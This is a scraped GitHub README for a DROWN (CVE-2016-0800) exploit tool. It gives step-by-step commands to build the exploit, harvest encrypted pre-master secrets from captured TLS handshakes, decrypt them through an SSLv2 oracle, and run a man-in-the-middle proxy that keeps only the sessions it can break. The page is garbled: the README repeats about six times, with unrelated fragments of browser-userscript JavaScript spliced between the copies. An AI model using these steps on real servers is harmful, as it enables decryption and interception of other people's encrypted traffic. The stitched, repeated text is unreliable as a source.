Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Add copy buttons to all
 blocks\n(function() {\n function addCopyButtons() {\n document.querySelectorAll('pre code').forEach(function(codeBlock) {\n if (codeBlock.parentElement.hasAttribute('data-copy-added')) return;\n codeBlock.parentElement.setAttribute('data-copy-added', 'true');\n \n var btn = document.createElement('button');\n btn.textContent = 'Copy';\n btn.style.cssText = 'position:absolute;top:4px;right:4px;padding:2px 8px;font-size:11px;background:#4ecdc4;border:none;border-radius:4px;color:#1a1a2e;cursor:pointer;opacity:0.7;transition:opacity 0.2s;';\n btn.onmouseover = function() { this.style.opacity = '1'; };\n btn.onmouseout = function() { this.style.opacity = '0.7'; };\n btn.onclick = function() {\n navigator.clipboard.writeText(codeBlock.textContent).then(function() {\n btn.textContent = 'Copied!';\n setTimeout(function() { btn.textContent = 'Copy'; }, 1500);\n });\n };\n codeBlock.parentElement.style.position = 'relative';\n codeBlock.parentElement.appendChild(btn);\n });\n }\n \n addCopyButtons();\n \n // Re-run on dynamic content\n var observer = new MutationObserver(addCopyButtons);\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Add Copy Buttons to Code Blocks");
}
} catch(__e) { console.warn('[Userscript:Add Copy Buttons to Code Blocks]', __e); }
})();
(function(){
try {
var __m = "github.com";
var __re = new RegExp('^' + "github\\.com" + '
Skip to content

Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Force GitHub README to respect dark mode\n(function() {\n var style = document.createElement('style');\n style.textContent = '\n .markdown-body {\n color-scheme: dark light;\n }\n .markdown-body pre { background: #161b22 !important; }\n .markdown-body code { background: rgba(110, 118, 129, 0.4) !important; }\n .markdown-body table th, .markdown-body table td { border-color: #30363d !important; }\n .markdown-body img { background: #0d1117; }\n .markdown-body blockquote { border-left-color: #8b949e; }\n .markdown-body hr { border-color: #30363d; }\n ';\n document.head.appendChild(style);\n})();", "GitHub Dark Mode README Fix"); } } catch(__e) { console.warn('[Userscript:GitHub Dark Mode README Fix]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Highlight search terms from Google/DuckDuckGo/Bing referrer\n(function() {\n var ref = document.referrer;\n var terms = [];\n \n if (ref.includes('google.com') || ref.includes('duckduckgo.com') || ref.includes('bing.com')) {\n var url = new URL(ref);\n var q = url.searchParams.get('q') || url.searchParams.get('p');\n if (q) {\n terms = q.split(/\\s+/).filter(function(t) { return t.length > 2; });\n }\n }\n \n if (terms.length === 0) return;\n \n var style = document.createElement('style');\n style.textContent = '.userscript-highlight { background: #fbbf24; color: #1a1a2e; padding: 1px 3px; border-radius: 2px; }';\n document.head.appendChild(style);\n \n function highlight(node) {\n if (node.nodeType === 3) { // text node\n var text = node.textContent;\n var found = false;\n terms.forEach(function(term) {\n var regex = new RegExp('(' + term.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\') + ')', 'gi');\n if (regex.test(text)) {\n found = true;\n var frag = document.createDocumentFragment();\n var parts = text.split(regex);\n parts.forEach(function(part, i) {\n if (i % 2 === 0) {\n frag.appendChild(document.createTextNode(part));\n } else {\n var span = document.createElement('span');\n span.className = 'userscript-highlight';\n span.textContent = part;\n frag.appendChild(span);\n }\n });\n node.parentNode.replaceChild(frag, node);\n }\n });\n } else if (node.nodeType === 1 && node.childNodes) { // element\n var skipTags = ['SCRIPT', 'STYLE', 'NOSCRIPT', 'TEXTAREA', 'INPUT', 'SELECT'];\n if (!skipTags.includes(node.tagName)) {\n Array.from(node.childNodes).forEach(highlight);\n }\n }\n }\n \n highlight(document.body);\n \n // Re-highlight on dynamic content\n var observer = new MutationObserver(function(mutations) {\n mutations.forEach(function(m) {\n m.addedNodes.forEach(function(node) {\n if (node.nodeType === 1 || node.nodeType === 3) highlight(node);\n });\n });\n });\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Highlight Search Terms"); } } catch(__e) { console.warn('[Userscript:Highlight Search Terms]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Strip utm_, fbclid, gclid, etc. from all links on page\n(function() {\n var trackingParams = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content',\n 'fbclid', 'gclid', 'dclid', 'msclkid', 'yclid',\n 'ref', 'ref_src', 'source', 'medium', 'campaign'];\n \n function cleanUrl(url) {\n try {\n var u = new URL(url, window.location.origin);\n var changed = false;\n trackingParams.forEach(function(p) {\n if (u.searchParams.has(p)) {\n u.searchParams.delete(p);\n changed = true;\n }\n });\n return changed ? u.toString() : url;\n } catch (e) {\n return url;\n }\n }\n \n function cleanLinks() {\n document.querySelectorAll('a[href]').forEach(function(a) {\n var clean = cleanUrl(a.href);\n if (clean !== a.href) a.href = clean;\n });\n }\n \n cleanLinks();\n \n var observer = new MutationObserver(function(mutations) {\n mutations.forEach(function(m) {\n m.addedNodes.forEach(function(node) {\n if (node.nodeType === 1) {\n if (node.tagName === 'A') cleanLinks();\n node.querySelectorAll('a[href]').forEach(function(a) {\n var clean = cleanUrl(a.href);\n if (clean !== a.href) a.href = clean;\n });\n }\n });\n });\n });\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "Remove Tracking Parameters from Links"); } } catch(__e) { console.warn('[Userscript:Remove Tracking Parameters from Links]', __e); } })(); (function(){ try { var __m = "youtube.com"; var __re = new RegExp('^' + "youtube\\.com" + '
Skip to content

Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Auto-enable theater mode on YouTube\n(function() {\n function tryTheater() {\n var btn = document.querySelector('button[aria-label=\"Theater mode\"], ytd-player #player button[title=\"Theater mode\"]');\n if (btn && !btn.classList.contains('activated')) {\n btn.click();\n }\n }\n \n // Try immediately\n tryTheater();\n \n // Try after navigation (SPA)\n var lastUrl = location.href;\n setInterval(function() {\n if (location.href !== lastUrl) {\n lastUrl = location.href;\n setTimeout(tryTheater, 500);\n }\n }, 1000);\n \n // Also try on player load\n var observer = new MutationObserver(tryTheater);\n observer.observe(document.body, { childList: true, subtree: true });\n})();", "YouTube Theater Mode Default"); } } catch(__e) { console.warn('[Userscript:YouTube Theater Mode Default]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

  • the same server, or another server, allows SSLv2 connections with the same public key ;
  • the TLS sessions uses RSA as a key exchange algorithm (no Diffie-Hellman) ;
  • the server is vulnerable to CVE-2016-0800 ;
  • there is a sufficient number of session.

Simulation

To simulate this scenario, want to record some TLS handshakes between a client and a server. We will use the old version of OpenSSL we have installed to create a server, and initiate a lot of sessions. We will capture the handshakes with tshark.

cd /path/to/prefix
./bin/openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 123
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
tshark -i lo -w handshakes.cap tcp port 4433
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 0.1) | ./bin/openssl s_client -connect 127.0.0.1:4433 -cipher kRSA; done

We can now get the encrypted pre-master secrets for each session with :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d :

To decrypt these handshakes, we need an OpenSSL server accepting SSLv2 connections :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We can now decrypt the encrypted pre-master secret :

tshark -r handshakes.cap -d tcp.port==4433,ssl -T fields -e ssl.handshake.epms -Y ssl.handshake.epms | tr -d : | ./decrypt localhost:4434 cert.pem > pms.txt

After some time and if we're lucky, we will have some results in pms.txt. You can use this file in Wireshark to decrypt the content of the TLS session (Protocol Preferences > SSL > (Pre)-Master-Secret log filename).

Gandalf attack

The passive attack allows us decrypt some TLS sessions (around 1/100 using 70 trimmers). If we want to see all the traffic between the client and the server, we can act as a MITM proxy between them and only allow sessions that we know we can decrypt. This will be effective if the client doesn't mind getting a TLS handshake abruptly closed, and if it tries hard to reconnect. This will typically work if the client is an automated process (and not a human !).

Simulation

We start our SSLv2 and TLS servers :

./bin/openssl s_server -cert cert.pem -key key.pem -accept 4433 -www
./bin/openssl s_server -cert cert.pem -key key.pem -accept 4434 -www -ssl2

We start our MITM server on port 4455 :

tlsgandalf 127.0.0.1:4455 127.0.0.1:4433 127.0.0.1:4434 cert.pem

We will record the packets with tshark, and start a bunch of sessions. We assume that the clients connects to our proxy (because of DNS spoofing, or something else) :

tshark -i lo -w handshakes.cap tcp port 4455
for i in $(seq 1000) ; do (echo 'GET / HTTP/1.1\r\n'; sleep 1) | ./bin/openssl s_client -connect 127.0.0.1:4455 -cipher kRSA; done

When a trimmer is found for one handshake, the proxy will print it to stdout. We can now process as before to decrypt the session.

Fully Active attack

The real power of the DROWN attack is that, if we are quick enough to break an encrypted master key before the client or server times out, we can do anything we want with the session content. Even better, even if the session wouldn't use RSA key exchange, we can force them to use it. Even even better, if the server uses authentication, the data that we send will be authenticated as being from the client.

For now, it's a work in progress...

About

Implementation of the DROWN attack on SSL2

Resources

Stars

15 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages

, 'i'); if (__m === '*' || __re.test(location.href)) { injectUserscript("// Remove or un-stick sticky/fixed headers that block content\n(function() {\n function unstick() {\n document.querySelectorAll('header, nav, [role=\"banner\"], .header, .navbar, .sticky, .fixed-top, [style*=\"position: fixed\"], [style*=\"position:sticky\"]').forEach(function(el) {\n if (el.style.position === 'fixed' || el.style.position === 'sticky' || \n getComputedStyle(el).position === 'fixed' || getComputedStyle(el).position === 'sticky') {\n el.style.position = 'static';\n el.style.top = 'auto';\n el.style.zIndex = 'auto';\n }\n });\n }\n \n unstick();\n \n var observer = new MutationObserver(unstick);\n observer.observe(document.body, { childList: true, subtree: true, attributes: true, attributeFilter: ['style', 'class'] });\n})();", "Kill Sticky Headers"); } } catch(__e) { console.warn('[Userscript:Kill Sticky Headers]', __e); } })(); (function(){ try { var __m = "*"; var __re = new RegExp('^' + ".*" + '
Skip to content

Repository files navigation

drown

Implementation of the special DROWN attack on SSL2

Note : this does not cover the general DROWN attack.

Installation

First, we need a version of OpenSSL with SSLv2 enabled. Also, if we want to make some simulations, we need a vulnerable OpenSSL (<= 1.0.1l). We will compile and install it on the folder /path/to/prefix :

wget https://www.openssl.org/source/openssl-1.0.1l.tar.gz
tar xzf openssl-1.0.1l.tar.gz
cd openssl-1.0.1l
./config enable-ssl2 enable-weak-ciphers --openssldir=/path/to/prefix
make && make install

Now let's compile the exploit :

git clone https://github.com/Tim---/drown
SSL_PREFIX=/path/to/prefix make

To decrypt an encrypted pre-master secret c, using the public key of the server at the address host:port, we will use the following command :

./decrypt host:port certfile c

Passive attack

In this type of attack, we can see the traffic between a server and a client using TLS. In this case, we can decrypt some TLS sessions if :

